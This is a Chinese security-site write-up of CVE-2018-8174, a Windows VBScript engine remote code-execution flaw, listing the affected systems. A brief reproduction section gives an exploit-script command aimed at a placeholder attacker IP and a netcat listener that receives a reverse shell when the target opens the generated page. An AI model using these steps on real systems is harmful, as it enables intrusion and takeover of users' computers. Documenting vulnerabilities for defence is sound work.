标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2020-2717]   作者: future 发表于: [2020-07-17]

本文共 [6] 位读者顶过

一、CVE-2018-8174(本质是 Windows VBScript Engine 代码执行漏洞)

由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的 VBScript 嵌入到 Office 文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码,该漏洞影响最新版本的IE浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打开 Office 文档时都可能中招,最终被黑客植入后门木马完全控制电脑。在基于 Web 的攻击情形中,攻击者能通过 Internet Explorer 利用此漏洞的特定网站,然后诱使用户查看该网站。攻击者还可以在承载 IE 呈现引擎的应用程序或 Microsoft Office 文档中嵌入标记为“安全初始化”的 ActiveX 控件。攻击者还可以利用受到破坏的网站和接受或托管用户提供的内容或广告的网站。这些网站可能包含可能利用此漏洞的特制内容。该漏洞影响最新版本的IE浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打开 Office 文档时都可能中招,最终被黑客植入后门木马完全控制电脑。

影响范围:

Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers

漏洞复现:[出自:jiwo.org]

执行 python 脚本,参数格式 “python CVE-2018-8174.py -u http://攻击机IP/payload.html -o payload.rtf -i 攻击机IP -p 指定端口” ,执行完毕后会生成 exploit.html 和 payload.rtf 两个文件放置网站跟目录下

监听nc -lvvp 攻击机端口

目标访问exploit.html 页面提示错误,但是攻击已经成功 返回shell

将弹计算器的poc保存到根目录下,目标机访问进行几次弹窗点击后出现计算器,弹计算器的poc会触发杀软请小心保存

评论

暂无
发表评论
 返回顶部 
热度(6)
 关注微信